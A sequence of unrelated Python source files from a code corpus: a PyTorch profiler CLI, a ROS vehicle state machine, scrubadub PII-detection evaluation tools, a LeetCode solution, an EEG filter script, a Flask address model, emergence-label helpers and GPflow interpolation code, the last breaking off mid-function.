| 2.34375 | 2 |
cli/skyline/__main__.py | danielsnider/ecosystem-project-website-template | 23 | 12761465 | <reponame>danielsnider/ecosystem-project-website-template
import argparse
import enum
import sys
import skyline
import skyline.commands.interactive
import skyline.commands.memory
import skyline.commands.time
def main():
    """Entry point for the `skyline` CLI: parse arguments and dispatch to a subcommand."""
    parser = argparse.ArgumentParser(
        prog="skyline",
        description="Skyline: Interactive Neural Network Performance "
                    "Profiler, Visualizer, and Debugger for PyTorch",
    )
    parser.add_argument(
        "-v", "--version",
        action="store_true",
        help="Print the version and exit.",
    )
    subparsers = parser.add_subparsers(title="Commands")
    # Each command module registers its own subparser and sets args.func.
    skyline.commands.interactive.register_command(subparsers)
    skyline.commands.memory.register_command(subparsers)
    skyline.commands.time.register_command(subparsers)
    args = parser.parse_args()

    if args.version:
        print('Skyline Command Line Interface', 'v' + skyline.__version__)
        return

    # No subcommand given: no register_command handler set args.func.
    if 'func' not in args:
        parser.print_help()
        sys.exit(1)

    # Run the specified command
    args.func(args)


if __name__ == '__main__':
    main()
| 2.640625 | 3 |
mission/finite_state_machine/scripts/go_to_and_inspect_pt_sm.py | theBadMusician/Vortex-AUV | 25 | 12761466 | #!/usr/bin/env python
import rospy
import numpy as np
from smach import State, StateMachine, Sequence
from smach_ros import SimpleActionState, MonitorState, IntrospectionServer
# action message
import actionlib
from actionlib_msgs.msg import GoalStatus
from geometry_msgs.msg import Pose, Point, Quaternion, PoseStamped
from nav_msgs.msg import OccupancyGrid, Odometry
from nav_msgs.srv import GetPlan, GetMap
from tf.transformations import quaternion_from_euler, euler_from_quaternion
from visualization_msgs.msg import Marker, MarkerArray
from vortex_msgs.msg import MoveAction, MoveGoal
def makeMoveGoal(contr_name, target_x, target_y, target_z, radius_of_acceptance = 0.2):
    """Build a MoveGoal action message.

    Goal layout (MoveAction):
    string controller_name
    geometry_msgs/Pose target_pose
    float32 radius_of_acceptance
    ---
    ---
    """
    goal = MoveGoal()
    goal.controller_name = contr_name
    goal.target_pose.position.x = target_x
    goal.target_pose.position.y = target_y
    goal.target_pose.position.z = target_z
    goal.radius_of_acceptance = radius_of_acceptance
    return goal
class TaskManager():
    """Builds and runs a two-state SMACH machine: move to a point, then inspect it."""

    def __init__(self):
        rospy.init_node('move_to_and_inspect_point_sm', anonymous=False)

        hsm = StateMachine(outcomes=['finished statemachine'])

        with hsm:
            # Drive to the target using the global PID controller; every
            # outcome transitions to the inspection state.
            StateMachine.add( 'GO_TO_POINT',
                              SimpleActionState( 'pid_global',
                                                 MoveAction,
                                                 makeMoveGoal("pid_global_plan", -3.0, 0, -0.5, radius_of_acceptance = 2.0)),
                              transitions = { "succeeded": 'INSPECT_POINT',
                                              "preempted": 'INSPECT_POINT',
                                              "aborted": 'INSPECT_POINT' })

            # Inspection loops back on itself on every outcome, so the machine
            # stays in this state until the node shuts down.
            StateMachine.add( 'INSPECT_POINT',
                              SimpleActionState( 'inspect_point',
                                                 MoveAction,
                                                 makeMoveGoal("inspect_point", -3.0, 0.0, -0.5, radius_of_acceptance=2.0)),
                              transitions = { 'succeeded': 'INSPECT_POINT',
                                              "preempted": 'INSPECT_POINT',
                                              "aborted": 'INSPECT_POINT' })

        # Introspection server lets smach_viewer visualize the running machine.
        intro_server = IntrospectionServer(str(rospy.get_name()), hsm,'/SM_ROOT')
        intro_server.start()
        hsm.execute()
        #patrol.execute()
        print("State machine execute finished")
        intro_server.stop()

    def shutdown(self):
        """Log and wait briefly so in-flight commands can settle before exit."""
        rospy.loginfo("stopping the AUV...")
        rospy.sleep(10)
if __name__ == '__main__':
    try:
        # Constructing TaskManager builds and executes the state machine.
        TaskManager()
        rospy.spin()
    except rospy.ROSInterruptException:
        rospy.loginfo("Pathplanning state machine has been finished")
scrubadub/comparison.py | Jomcgi/scrubadub | 0 | 12761467 | import re
import copy
import random
from faker import Faker
from . import filth as filth_module
from .filth import Filth
from .detectors.known import KnownFilthItem
from typing import List, Dict, Union, Optional, Tuple
import pandas as pd
import sklearn.metrics
def get_filth_classification_report(
        filth_list: List[Filth],
        output_dict: bool = False,
) -> Optional[Union[str, Dict[str, float]]]:
    """Evaluates the performance of detectors using KnownFilth.

    An example of using this is shown below:

    .. code:: pycon

        >>> import scrubadub, scrubadub.comparison, scrubadub.detectors.text_blob
        >>> scrubber = scrubadub.Scrubber(detector_list=[
        ...     scrubadub.detectors.TextBlobNameDetector(name='name_detector'),
        ...     scrubadub.detectors.KnownFilthDetector([
        ...         {'match': 'Tom', 'filth_type': 'name'},
        ...         {'match': '<EMAIL>', 'filth_type': 'email'},
        ...     ]),
        ... ])
        >>> filth_list = list(scrubber.iter_filth("Hello I am Tom"))
        >>> print(scrubadub.comparison.get_filth_classification_report(filth_list))
        filth          detector     locale      precision    recall  f1-score   support
        <BLANKLINE>
        name      name_detector      en_US           1.00      1.00      1.00         1
        <BLANKLINE>
                                  accuracy                               1.00         1
                                 macro avg           1.00      1.00      1.00         1
                              weighted avg           1.00      1.00      1.00         1
        <BLANKLINE>

    :param filth_list: The list of detected filth
    :type filth_list: A list of `Filth` objects
    :param output_dict: Return the report in JSON format, defaults to False
    :type output_dict: bool, optional
    :return: The report in JSON (a `dict`) or in plain text, or None if no
        relevant filth was found
    :rtype: `str` or `dict`
    """
    results = []  # type: List[Dict[str, int]]
    # Column widths used to align the plain-text report header later on.
    filth_max_length = 0
    detector_name_max_length = 0
    locale_max_length = 0

    # Build one row per filth item; each row marks which "type:detector:locale"
    # combinations fired on that piece of text.
    for filth_item in filth_list:
        sub_filths = [filth_item]
        if isinstance(filth_item, filth_module.base.MergedFilth):
            # A merged filth contains the overlapping sub-filths it was built from.
            sub_filths = filth_item.filths
        results_row = {}
        for sub_filth in sub_filths:
            if isinstance(sub_filth, filth_module.KnownFilth) and sub_filth.comparison_type is not None:
                # Ground-truth entry: keyed by the type it should be compared against.
                results_row[
                    '{}:{}:{}'.format(sub_filth.comparison_type, filth_module.KnownFilth.type, sub_filth.locale)] = 1
            else:
                try:
                    results_row['{}:{}:{}'.format(sub_filth.type, sub_filth.detector_name, sub_filth.locale)] = 1
                except AttributeError:
                    print(type(sub_filth), sub_filth)
                    raise

        # Dont include filth that was not produced by one of the detectors of interest
        if sum(results_row.values()) > 0:
            results.append(results_row)

    if len(results) == 0:
        return None

    # One-hot matrix: rows = filth occurrences, columns = (filth, detector, locale).
    results_df = pd.DataFrame(results).fillna(0).astype(int)
    results_df.columns = pd.MultiIndex.from_tuples(
        results_df.columns.str.split(':').values.tolist(),
        names=['filth_type', 'detector_name', 'locale'],
    )

    # Find filth types that have some known filth
    known_types = [x[0] for x in results_df.columns if x[1] == filth_module.KnownFilth.type]
    # Select columns for filth that have related known filth, but that are not known filth
    detected_columns = [
        x for x in results_df.columns
        if x[1] != filth_module.KnownFilth.type and x[0] in known_types
    ]
    detected_classes = results_df.loc[:, detected_columns].values

    # Take the detected_columns above and find their associated known counterparts
    known_cols = [(x[0], filth_module.KnownFilth.type, x[2]) for x in detected_columns]
    true_classes = results_df.loc[:, known_cols].values

    if not output_dict:
        # Right-align each column of the text report to the widest entry.
        filth_max_length = max([len(x[0]) for x in detected_columns] + [len("filth")])
        detector_name_max_length = max([len(x[1]) for x in detected_columns] + [len("detector")]) + 4
        locale_max_length = max([len(x[2]) for x in detected_columns] + [len("locale")]) + 4
        class_labels = [
            "{} {} {} ".format(
                x[0].rjust(filth_max_length),
                x[1].rjust(detector_name_max_length),
                x[2].rjust(locale_max_length)
            )
            for x in detected_columns
        ]
    else:
        class_labels = ["{}:{}:{}".format(*x) for x in detected_columns]

    report_labels = []
    # If there is only one label reshape the data so that
    # the classification_report interprets it less ambiguously
    if detected_classes.shape[1] == 1:
        detected_classes = detected_classes.T[0]
        true_classes = true_classes.T[0]
        report_labels = [1]
    else:
        # Sort labels alphabetically, keeping the label/index pairing intact.
        report_labels = [class_labels.index(x) for x in sorted(class_labels)]
        class_labels = sorted(class_labels)

    report = sklearn.metrics.classification_report(
        true_classes,
        detected_classes,
        output_dict=output_dict,
        zero_division=0,
        target_names=class_labels,
        labels=report_labels,
        # **extra_args
    )
    if not output_dict:
        # Prepend an aligned header line to the plain-text report.
        report = (
            'filth'.rjust(filth_max_length) +
            'detector'.rjust(detector_name_max_length + 1) +
            'locale'.rjust(locale_max_length + 1) +
            (' '*4) +
            report.lstrip(' ')
        )
    return report
def get_filth_dataframe(filth_list: List[Filth]) -> pd.DataFrame:
    """Produces a pandas `DataFrame` to allow debugging and improving detectors.

    An example of using this is shown below:

    .. code:: pycon

        >>> import scrubadub, scrubadub.comparison, scrubadub.detectors.text_blob
        >>> scrubber = scrubadub.Scrubber(detector_list=[
        ...     scrubadub.detectors.TextBlobNameDetector(name='name_detector'),
        ...     scrubadub.detectors.KnownFilthDetector([
        ...         {'match': 'Tom', 'filth_type': 'name'},
        ...         {'match': '<EMAIL>', 'filth_type': 'email'},
        ...     ]),
        ... ])
        >>> filth_list = list(scrubber.iter_filth("Hello I am Tom"))
        >>> with pd.option_context("display.max_columns", 20):
        ...     print(scrubadub.comparison.get_filth_dataframe(filth_list))  # doctest: +NORMALIZE_WHITESPACE
           group_id  filth_id filth_type  detector_name document_name text  beg  end \\
        0         0         0       name  name_detector          None  Tom   11   14
           locale  known_filth comparison_type known_text  known_beg  known_end \\
        0   en_US         True             NaN        Tom         11         14
          known_comparison_type  exact_match  partial_match  true_positive \\
        0                  name         True           True           True
           false_positive  false_negative
        0           False           False

    :param filth_list: The list of detected filth
    :type filth_list: A list of `Filth` objects
    :return: A `pd.DataFrame` containing information about the detected `Filth`
    :rtype: `pd.DataFrame`
    """
    # Flatten the (possibly merged) filth into one row per sub-filth.
    results = []
    for group_id, filth_item in enumerate(filth_list):
        sub_filths = [filth_item]
        if isinstance(filth_item, filth_module.base.MergedFilth):
            sub_filths = filth_item.filths
        for filth_id, sub_filth in enumerate(sub_filths):
            results.append({
                'group_id': group_id,   # same id for filths merged together
                'filth_id': filth_id,   # position within the merged group
                'filth_type': sub_filth.type,
                'detector_name': getattr(sub_filth, 'detector_name', float('nan')),
                'document_name': getattr(sub_filth, 'document_name', float('nan')),
                'text': sub_filth.text,
                'beg': sub_filth.beg,
                'end': sub_filth.end,
                'locale': sub_filth.locale,
                'known_filth': isinstance(sub_filth, filth_module.KnownFilth),
                'comparison_type': getattr(sub_filth, 'comparison_type', float('nan')),
            })
    results_df = pd.DataFrame(results)

    # Outer-join detected filth against known (ground-truth) filth on the merge
    # group and filth type; known_* columns come from the ground-truth side.
    suffix_label = '_y_suffix'
    return (
        pd.merge(
            results_df[~results_df['known_filth']],
            results_df[results_df['known_filth']][['group_id', 'text', 'beg', 'end', 'comparison_type']],
            how='outer',
            left_on=('group_id', 'filth_type'),
            right_on=('group_id', 'comparison_type'),
            suffixes=('', suffix_label)
        )
        .rename(columns=lambda x: x if not x.endswith(suffix_label) else 'known_' + x[:-len(suffix_label)])
        .assign(
            known_filth=lambda df: ~pd.isnull(df['known_text']),
            exact_match=lambda df: (df['text'] == df['known_text']).fillna(False),
            partial_match=lambda df: ((df['beg'] < df['known_end']) & (df['end'] > df['known_beg']).fillna(False)),
            true_positive=lambda df: (~pd.isnull(df['known_text'])) & (~pd.isnull(df['text'])),
            false_positive=lambda df: (pd.isnull(df['known_text'])) & (~pd.isnull(df['text'])),
            false_negative=lambda df: (~pd.isnull(df['known_text'])) & (pd.isnull(df['text'])),
        )
    )
def make_fake_document(
        paragraphs: int = 20, locale: str = 'en_US', seed: Optional[int] = None, faker: Optional[Faker] = None,
        filth_types: Optional[List[str]] = None
) -> Tuple[str, List[KnownFilthItem]]:
    """Creates a fake document containing `Filth` that needs to be removed. Also returns the list of known filth
    items that are needed by the `KnownFilthDetector`\\ .

    An example of using this is shown below:

    .. code:: pycon

        >>> import scrubadub, scrubadub.comparison
        >>> document, known_filth_items = scrubadub.comparison.make_fake_document(paragraphs=1, seed=1)
        >>> scrubber = scrubadub.Scrubber()
        >>> scrubber.add_detector(scrubadub.detectors.KnownFilthDetector(known_filth_items=known_filth_items))
        >>> filth_list = list(scrubber.iter_filth(document))
        >>> print(scrubadub.comparison.get_filth_classification_report(filth_list))
        filth    detector     locale      precision    recall  f1-score   support
        <BLANKLINE>
          url         url      en_US           1.00      1.00      1.00         1
        email       email      en_US           1.00      1.00      1.00         2
        <BLANKLINE>
                            micro avg           1.00      1.00      1.00         3
                            macro avg           1.00      1.00      1.00         3
                         weighted avg           1.00      1.00      1.00         3
                          samples avg           1.00      1.00      1.00         3
        <BLANKLINE>

    :param paragraphs: The list of detected filth
    :type paragraphs: int
    :param locale: The locale of the documents in the format: 2 letter lower-case language code followed by an
                   underscore and the two letter upper-case country code, eg "en_GB" or "de_CH"
    :type locale: str
    :param seed: The random seed used to generate the document
    :type seed: int, optional
    :param faker: A Faker object that is used to generate the text
    :type faker: int
    :param filth_types: A list of the ``Filth.type`` to generate
    :type filth_types: List[str]
    :return: The document and a list of `KnownFilthItem`\\ s
    :rtype: Tuple[str, List[KnownFilthItem]]
    """
    if faker is None:
        faker = Faker(locale=locale)

    # TODO: register filth types to build up a dict that can be read from, like the detectors
    possible_filth = [
        filth_module.AddressFilth,
        filth_module.EmailFilth,
        filth_module.NameFilth,
        filth_module.PhoneFilth,
        filth_module.PostalCodeFilth,
        filth_module.SSNFilth,
        filth_module.TwitterFilth,
        filth_module.UrlFilth,
    ]
    if filth_types is not None:
        # Restrict generation to the requested filth types only.
        possible_filth = [filth for filth in possible_filth if filth.type in filth_types]

    if seed is not None:
        # Seed both Faker and random so the document is reproducible.
        Faker.seed(seed)
        random.seed(seed)

    doc = ""
    known_items = []  # type: List[KnownFilthItem]
    for i_paragraph in range(paragraphs):
        for i_sentance_group in range(random.randint(1, 10)):
            text = faker.text()
            # Pick a random whitespace/period position and splice the PII in
            # there, surrounded by the matched separator character.
            matches = list(re.finditer(r'[\s.]', text))
            position = random.choice(matches)
            chosen_filth = random.choice(possible_filth)
            pii_text = chosen_filth.generate(faker=faker)
            known_items.append({
                'match': copy.copy(pii_text),
                'filth_type': copy.copy(chosen_filth.type),
            })
            doc += (
                text[:position.start()] +
                position.group() +
                pii_text +
                position.group() +
                text[position.end():]
            )
        doc += "\n\n"

    return (doc.strip(), known_items)
| 2.515625 | 3 |
easy/1837-sum-of-digits-in-base-k.py | changmeng72/leecode_python3 | 0 | 12761468 | <filename>easy/1837-sum-of-digits-in-base-k.py
class Solution:
    def sumBase(self, n: int, k: int) -> int:
        """Return the sum of the digits of ``n`` when written in base ``k``."""
        total = 0
        while n > 0:
            # Peel off the least-significant base-k digit each iteration.
            n, digit = divmod(n, k)
            total += digit
        return total
| 3.421875 | 3 |
filter1.py | WillSmithTE/arl-eegmodels | 0 | 12761469 | <reponame>WillSmithTE/arl-eegmodels
# https://github.com/poganyg/IIR-filter
import matplotlib.pyplot as plt
import numpy as np
from IIR2Filter import IIR2Filter
from getDataAndLabels1Subj1 import getDataAndLabels, channelsSamplesTrialKernels, getConfusionMatrixNames, getNumClasses
# Load EEG trials and their class labels from the project data loader.
[data, labels] = getDataAndLabels()

fs = 200  # sample rate assumed for the frequency axis of the plot below
# NOTE(review): the filter is designed with fs=231 while the plot uses fs=200 --
# confirm which sample rate the EEG recordings actually use.
FilterMains = IIR2Filter(3,[0.5,40],'bandpass', fs=231)

# impulse = np.zeros(1000)
# impulse[0] = 1
# impulseResponse = np.zeros(len(impulse))
# NOTE(review): despite the name, this is the first trial's data (not an
# impulse); the loop below filters it sample-by-sample and mutates data[0]
# in place because no copy is taken -- confirm that is intended.
impulseResponse = data[0]
for i in range(len(impulseResponse)):
    for j in range(len(impulseResponse[i])):
        impulseResponse[i][j] = FilterMains.filter(impulseResponse[i][j])

# To obtain the frequency response from the impulse response the Fourier
# transform of the impulse response has to be taken. As it produces
# a mirrored frequency spectrum, it is enough to plot the first half of it.
freqResponse = np.fft.fft(impulseResponse)
freqResponse = abs(freqResponse[0:int(len(freqResponse)/2)])
xfF = np.linspace(0,fs/2,len(freqResponse))

plt.figure("Frequency Response")
plt.plot(xfF,np.real(freqResponse))
plt.xlabel("Frequency [Hz]")
plt.ylabel("Amplitude")
plt.title("Bandstop")
plt.show()
States/HighscoreTest.py | Nat-133/Multiplayer-Snake | 0 | 12761470 | <filename>States/HighscoreTest.py<gh_stars>0
import os
import pickle

# Number of players selects which high-score file is read.
playerNo = 1

currentPath = os.path.dirname(__file__)
newPath = os.path.relpath("\\High Scores\\highscore{}p.txt".format(playerNo), currentPath)

# Bug fix: the intent is to READ the stored high score and print it, so the
# file must be opened in "rb" mode and deserialised with pickle.load().
# The original `pickle.dump(f)` with mode "wb" would raise a TypeError
# (dump requires both an object and a file) and would truncate the file.
with open("..\\High Scores\\highscore{}p.txt".format(playerNo), "rb") as f:
    highscore = pickle.load(f)
print(highscore)

#print(os.path.relpath("..\\High Scores"),os.path.dirname(__file__))
#print(os.path.relpath("..\\High Scores\\highscore{}p.txt".format(playerNo),currentPath))
#>>>..\High Scores\highscore1p.txt
print(os.pardir)
print(currentPath)
print(newPath)
app/models/address.py | TianJin85/mall | 0 | 12761471 | # -*- encoding: utf-8 -*-
"""
@File : address.py
@Time : 2020/4/24 13:57
@Author : Tianjin
@Email : <EMAIL>
@Software: PyCharm
"""
from lin.exception import NotFound, ParameterException
from lin.interface import InfoCrud as Base
from sqlalchemy import Integer, Column, ForeignKey, String, Boolean
class Address(Base):
    """Shipping-address model.

    A user may own many addresses but at most one flagged as the default;
    the helpers below keep that invariant when creating or amending rows.
    """
    __tablename__ = "Address"

    id = Column("id",Integer, primary_key=True, autoincrement=True, comment="收货地址id")
    userId = Column("userId", Integer, ForeignKey("UserInfo.id"), nullable=False, comment="用户id")
    userName = Column("userName", String(32), nullable=False, comment="用户姓名")
    address = Column("address", String(250), nullable=False, comment="收货地址")
    phoneCode = Column("phoneCode", String(11), nullable=False, comment="电话号码")
    default = Column("default", Boolean, nullable=False, comment="默认地址")

    @classmethod
    def _unset_current_default(cls, user_id):
        """Unset the user's current default address, if any.

        :param user_id: id of the owning user.
        :return: the previously-default ``Address`` row, or ``None``.
        """
        current = Address.query.filter_by(userId=user_id, delete_time=None, default=True).first()
        if current:
            current.update(
                default=False,
                commit=True
            )
        return current

    @classmethod
    def append(cls, data):
        """Create a new address from submitted form data.

        ``data["default"]`` arrives as the string "True"/"False" (form data);
        when the new address is the default, any existing default is unset
        first so the one-default invariant holds.
        """
        is_default = data["default"] == "True"
        if is_default:
            cls._unset_current_default(data["userId"])
        Address.create(
            userId=int(data["userId"]),
            userName=data["userName"],
            address=data["address"],
            phoneCode=data["phoneCode"],
            default=is_default,
            commit=True
        )

    @classmethod
    def amend_default_address(cls, form):
        """Make the address identified by ``form.id`` the user's new default.

        :raises NotFound: if the user has no current default address, or the
            target address does not exist.
        """
        if cls._unset_current_default(form.userId.data) is None:
            raise NotFound(msg='没有找到相关用户')
        address = Address.query.filter_by(id=form.id.data, delete_time=None).first()
        if address is None:
            raise NotFound(msg='没有找到相关地址')
        address.update(
            userName=form.userName.data,
            address=form.address.data,
            phoneCode=form.phoneCode.data,
            default=True,
            commit=True
        )

    @classmethod
    def address_list(cls, userId):
        """Return all non-deleted addresses of a user.

        :raises NotFound: if the user has no addresses.
        """
        addresses = Address.query.filter_by(userId=userId, delete_time=None).all()
        if not addresses:
            raise NotFound(msg="没有找到相关地址")
        return addresses

    @classmethod
    def delete_address(cls, id):
        """Soft-delete an address by primary key.

        :raises NotFound: if no such (non-deleted) address exists.
        """
        address = Address.query.filter_by(id=id, delete_time=None).first()
        if address is None:
            raise NotFound(msg="没有找到相关地址")
        address.delete(
            commit=True
        )
| 2.421875 | 2 |
scripts/vandv/emergence_labels.py | salmaniqbal/pyGrams | 25 | 12761472 | import numpy as np
import pandas as pd
from tqdm import tqdm
def map_prediction_to_emergence_label(results, training_values, test_values, predictors_to_run, test_terms,
                                      emergence_linear_thresholds=(
                                          ('rapidly emergent', 0.1),
                                          ('emergent', 0.02),
                                          ('stationary', -0.02),
                                          ('declining', None)
                                      )):
    """Map each predictor's output time series to a discrete emergence label by
    fitting a linear trend and thresholding its slope.

    ``emergence_linear_thresholds`` is ordered from most to least emergent; the
    final entry (threshold ``None``) is the catch-all label. (It is a tuple, so
    the mutable-default pitfall does not apply.)
    """
    def __map_helper(normalised_counts_to_trend, predicted_emergence, predictor_name, test_term,
                     emergence_linear_thresholds):
        # Any NaN in the series makes the fit meaningless; record a failure.
        if np.isnan(sum(normalised_counts_to_trend)):
            predicted_emergence[predictor_name][test_term] = 'Fail'
            return

        x_data = range(len(normalised_counts_to_trend))
        trend = np.polyfit(x_data, normalised_counts_to_trend, 1)  # [slope, intercept]

        # Start from the catch-all label and upgrade to the first threshold exceeded.
        emergence = emergence_linear_thresholds[-1][0]
        for emergence_threshold in emergence_linear_thresholds[:-1]:
            if trend[0] > emergence_threshold[1]:
                emergence = emergence_threshold[0]
                break
        predicted_emergence[predictor_name][test_term] = emergence

    predicted_emergence = {}

    # Label the ground-truth ("Actual") series first, when test values exist.
    if test_values:
        predictor_name = 'Actual'
        predicted_emergence[predictor_name] = {}
        for test_term in tqdm(test_terms, unit='term', desc='Labelling prediction ' + predictor_name):
            counts_to_trend = test_values[test_term]
            # Normalise by the training-window peak so slopes are comparable across terms.
            max_training_value = max(training_values[test_term])
            normalised_counts_to_trend = [x / max_training_value for x in counts_to_trend]
            __map_helper(normalised_counts_to_trend, predicted_emergence, predictor_name, test_term,
                         emergence_linear_thresholds)

    # Then label each predictor's forecast for every term.
    for predictor_name in predictors_to_run:
        predicted_emergence[predictor_name] = {}
        for test_term in tqdm(test_terms, unit='term', desc='Labelling prediction ' + predictor_name):
            (none, configuration, predicted_values, num_training_values) = results[predictor_name][test_term]
            counts_to_trend = predicted_values.ravel().tolist()
            max_training_value = max(training_values[test_term])
            normalised_counts_to_trend = [x / max_training_value for x in counts_to_trend]
            __map_helper(normalised_counts_to_trend, predicted_emergence, predictor_name, test_term,
                         emergence_linear_thresholds)
    return predicted_emergence
def report_predicted_emergence_labels_html(predicted_emergence, emergence_colours={
'highly emergent': 'lime',
'emergent': 'green',
'stationary': 'black',
'declining': 'red'}):
html_string = f'''
<h2>Emergence Label Prediction</h2>
'''
# df = pd.DataFrame(predicted_emergence, index=[0])
test_terms = list(predicted_emergence[list(predicted_emergence.keys())[0]].keys())
df_results = pd.DataFrame({'terms': test_terms})
predictor_display_names = []
for predictor_name in predicted_emergence:
term_results = []
for test_term in predicted_emergence[predictor_name]:
result = predicted_emergence[predictor_name][test_term]
term_results.append(result)
predictor_display_name = predictor_name.replace('-', '<br/>')
predictor_display_names.append(predictor_display_name)
df_term_column = pd.DataFrame({predictor_display_name: term_results})
df_results = df_results.join(df_term_column)
df_summary_table = df_results.style.hide_index()
df_summary_table = df_summary_table.set_table_styles([
dict(selector='table', props=[('border-collapse', 'collapse')]),
dict(selector='td', props=[('border', '2px solid black'),
('text-align', 'right'),
('padding-left', '15px'),
('padding-right', '15px')])
])
def colour_emergence(val):
colour = 'black'
if val in emergence_colours:
colour = emergence_colours[val]
return f'color: {colour}'
df_summary_table = df_summary_table.applymap(colour_emergence)
# for predictor_name in predictor_names:
# df_summary_table = df_summary_table.format({predictor_name: predictor_style})
# df_summary_table = df_summary_table.highlight_min(axis=1)
html_string += '<style type="text/css">table {border-collapse: collapse;} </style>\n'
html_string += df_summary_table.render()
return html_string
| 2.640625 | 3 |
gpflowSlim/interpolation_eager.py | jereliu/GPflow-Slim | 1 | 12761473 | <reponame>jereliu/GPflow-Slim
# Copyright 2018 <NAME>
# Copyright 2017 st--, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.from __future__ import print_function
import tensorflow as tf
import numpy as np
from . import settings
from .kronecker import Kronecker
class GridInteprolation(object):
    """Regular inducing-point grid for structured kernel interpolation (SKI).

    NOTE(review): the class name is misspelled ("Inteprolation") but renaming
    it would break external callers.
    """
    def __init__(
            self,
            base_kernel,
            grid_size,
            grid_bounds,
            active_dims=None,
    ):
        # Build a per-dimension grid spanning grid_bounds, padded by one grid
        # step on either side (hence grid_size - 2 interior intervals).
        grid = np.zeros([len(grid_bounds), grid_size], dtype=settings.float_type)
        for i in range(len(grid_bounds)):
            grid_diff = float(grid_bounds[i][1] - grid_bounds[i][0]) / (grid_size - 2)
            # NOTE(review): a TF tensor is assigned into a NumPy row here;
            # this presumably relies on eager execution auto-converting the
            # tensor -- confirm this module is only used in eager mode.
            grid[i] = tf.linspace(
                grid_bounds[i][0] - grid_diff,
                grid_bounds[i][1] + grid_diff,
                grid_size,
            )

        # Enumerate the full Cartesian product of the per-dimension grids:
        # grid_size ** d rows, one column per dimension.
        inducing_points = np.zeros([
            int(pow(grid_size, len(grid_bounds))),
            len(grid_bounds)
        ], dtype=settings.float_type)
        prev_points = None
        for i in range(len(grid_bounds)):
            for j in range(grid_size):
                inducing_points[
                    j * grid_size ** i:(j + 1) * grid_size ** i, i
                ] = grid[i, j]
                if prev_points is not None:
                    # Tile the combinations built for the previous dimensions.
                    inducing_points[
                        j * grid_size ** i:(j + 1) * grid_size ** i, :i
                    ] = prev_points
            prev_points = inducing_points[:grid_size ** (i + 1), :(i + 1)]

        self.inducing_points = tf.constant(inducing_points)
        self.grid = tf.constant(grid)
        self.grid_bounds = grid_bounds
        self.grid_size = grid_size
        self.kernel = base_kernel

    def _inducing_forward(self):
        # The grid covariance factorises as a Kronecker product of the
        # per-dimension covariance matrices.
        covs = []
        for id in range(len(self.grid_bounds)):
            cov = self.kernel.Kdim(id, tf.expand_dims(self.grid[id], 1))
            covs.append(cov)
        return Kronecker(covs)

    def _compute_interpolation(self, inputs):
        """
        :param inputs: [n, d]
        :return: sparse interpolation matrix of shape [n, grid_size ** d]
        """
        pass  # not implemented in this eager variant
class Interpolation(object):
    """Cubic-convolution interpolation of scattered points onto a regular grid."""

    def _cubic_interpolation_kernel(self, scaled_grid_dist):
        """
        Computes the interpolation kernel u() for points X given the scaled
        grid distances:
                                    (X-x_{t})/s
        where s is the distance between neighboring grid points. Note that,
        in this context, the word "kernel" is not used to mean a covariance
        function as in the rest of the package. For more details, see the
        original paper Keys et al., 1989, equation (4).

        scaled_grid_dist should be an n-by-g matrix of distances, where the
        (ij)th element is the distance between the ith data point in X and the
        jth element in the grid.

        Note that, although this method ultimately expects a scaled distance matrix,
        it is only intended to be used on single dimensional data.
        """
        U = tf.abs(scaled_grid_dist)
        res = tf.zeros_like(U, dtype=settings.tf_float)

        # u(s) = 1.5|s|^3 - 2.5|s|^2 + 1 when |s| < 1
        U_lt_1 = tf.cast(tf.less(U, 1), dtype=settings.float_type)
        res = res + ((1.5 * U - 2.5) * U**2 + 1) * U_lt_1

        # u(s) = -0.5|s|^3 + 2.5|s|^2 - 4|s| + 2 when 1 < |s| < 2
        U_ge_1_le_2 = 1 - U_lt_1  # U, if U <= 1 <= 2, 0 otherwise
        res = res + (((-0.5 * U + 2.5) * U - 4) * U + 2) * U_ge_1_le_2
        return res

    def interpolate(self, x_grid, x_target, interp_points=range(-2, 2)):
        """Compute cubic interpolation indices/weights of x_target onto x_grid.

        :param x_grid: [d, g] per-dimension grid point locations.
        :param x_target: [n, d] points to interpolate.
        :param interp_points: relative offsets of the grid points used per target.
        :return: (interp_indices, interp_values), each [n, len(interp_points)**d].
        """
        num_grid_points = tf.shape(x_grid)[1].numpy()
        num_target_points = tf.shape(x_target)[0]
        num_dim = tf.shape(x_grid)[0].numpy()
        num_coefficients = len(interp_points)

        interp_points_flip = tf.cast(interp_points[::-1], settings.tf_float)
        interp_points = tf.cast(interp_points, settings.tf_float)

        interp_values = tf.ones([num_target_points, num_coefficients ** num_dim], dtype=settings.tf_float)
        interp_indices = tf.zeros([num_target_points, num_coefficients ** num_dim], dtype=settings.int_type)

        for i in range(num_dim):
            grid_delta = x_grid[i, 1] - x_grid[i, 0]
            # Index of the nearest grid point below each target, then shifted
            # so the interpolation stencil is centred on it.
            lower_grid_pt_idxs = tf.squeeze(tf.floor((x_target[:, i] - x_grid[i, 0]) / grid_delta))
            lower_pt_rel_dists = (x_target[:, i] - x_grid[i, 0]) / grid_delta - lower_grid_pt_idxs
            lower_grid_pt_idxs = lower_grid_pt_idxs - tf.reduce_max(interp_points)

            scaled_dist = tf.expand_dims(lower_pt_rel_dists, -1) + tf.expand_dims(interp_points_flip, -2)
            dim_interp_values = self._cubic_interpolation_kernel(scaled_dist)

            # Find points who's closest lower grid point is the first grid point
            # This corresponds to a boundary condition that we must fix manually.
            left_boundary_pts = tf.where(lower_grid_pt_idxs < 1)
            num_left = tf.shape(left_boundary_pts)[0].numpy()

            ## only support eager mode for now.
            if num_left > 0:
                left_boundary_pts = tf.squeeze(left_boundary_pts, 1)
                x_grid_first = tf.tile(tf.transpose(tf.expand_dims(x_grid[i, :num_coefficients], 1)), [num_left, 1])
                grid_targets = tf.tile(tf.expand_dims(tf.gather(x_target[:, i], left_boundary_pts), 1), [1, num_coefficients])
                dists = tf.abs(x_grid_first - grid_targets)
                closest_from_first = tf.argmin(dists, 1)

                # NOTE(review): item assignment on TF tensors raises TypeError;
                # this branch presumably assumes NumPy-backed values -- confirm
                # it is exercised/tested in eager mode.
                for j in range(num_left):
                    dim_interp_values[left_boundary_pts[j], :] = 0
                    dim_interp_values[left_boundary_pts[j], closest_from_first[j]] = 1
                    lower_grid_pt_idxs[left_boundary_pts[j]] = 0
